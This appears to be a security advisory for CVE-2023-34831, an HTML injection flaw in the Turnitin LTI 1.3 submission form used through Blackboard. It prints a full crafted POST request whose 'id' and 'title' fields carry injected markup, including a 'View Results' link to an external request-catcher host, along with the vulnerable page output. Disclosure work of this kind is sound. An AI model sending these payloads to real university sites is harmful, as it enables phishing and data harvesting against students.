/
Turnitin_LTI_1.3_HTMLi_CVE-2023-34831.txt
73 lines (47 loc) · 3.75 KB
/
Turnitin_LTI_1.3_HTMLi_CVE-2023-34831.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
Turnitin LTI Version 1.3 - HTML Injection - CVE-2023-34831
-----------------------------------------------------------
Type: Authenticated Remote attack
We have identified that the "Submission Web Form" of Turnitin LTI tool/plugin version 1.3, which is used by third parties such as universities (Blackborard software) is affected by HTML Injection attacks. The security issue affects the submission web form ("id" and "title" HTTP POST parameters) where the students submit their reports for similarity/plagiarism checks. By leveraging this issue, an attacker is able to cause arbitrary HTML code to be executed in a user's browser within the security context of the affected site. An attacker can trick the victim into clicking on a malicious link via Social Engineering/Phishing attack, which can result in malware download or sensitive information harvesting.
Successful attack requires the attacker to have access on the targeted user's account so that they will be able to craft the malicous request based on the user data such as course id, content id, etc.
Sensitive information values have been replaced with random ones for confidentiality issues.
Evidence is provided:
Edited/Malicious Request:
POST /webapps/ip-turnitintool- BB5d0xxxxxxx3e79/student/submit? course_id=_11111_1&course_batch_id=11111-2056&content_id=_1111111_1&assign_id=11111&selectPart=&selectUser=HTTP/1.1
Host: university-domain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------9450000001598047787961111111
Content-Length: 1077
Origin: https://university-domain
DNT: 1
Connection: close
Referer: https://university-domain/webapps/ip-turnitintool-BB5d0xxxxxxx3e79/student/submit?course_id=_11111_1&course_batch_id=11111-2056&content_id=_1111111_1&assign_id=11111&selectPart=&selectUser=
Cookie: mycookies
-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="id"
-1"</span></div><b>HTML Injection</b><div><span>"-1<b>HTML Injection</b>
-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="submissionType"
file
-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="userBatchId"
My-student-id
-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="title"
<a href="https://enwj2e1t9en4.x.pipedream.net"><b>View Results</b></a>
-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="partTurnitinId"
13479124
-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="multipartFile"; filename=""
Content-Type: application/octet-stream
-----------------------------9450000001598047787961111111
Content-Disposition: form-data; name="_disclaimer"
on
-----------------------------9450000001598047787961111111—
Affected Source Code:
<div id="inlineReceipt_bad" class="receipt bad">
<h3 class="hideoff">Failed</h3>
<span id="badMsg1"><ul><li>id - Failed to convert property value of type 'java.lang.String' to required type 'java.lang.Integer' for property 'id'; nested exception is java.lang.NumberFormatException: For input string: "-1"</span></div><b>HTMLInjection</b><div><span>"-1<b>HTMLInjection</b>"</li><li>multipartFile - Please select a file.</li><li>disclaimer - You must accept the stated notice.</li></ul></span><br>
<td>Submission Title</td><td><span class="truncate submission-title-receipt"><a href="https://enwj2e1t9en4.x.pipedream.net"><b>View Results</b></a> </span></td>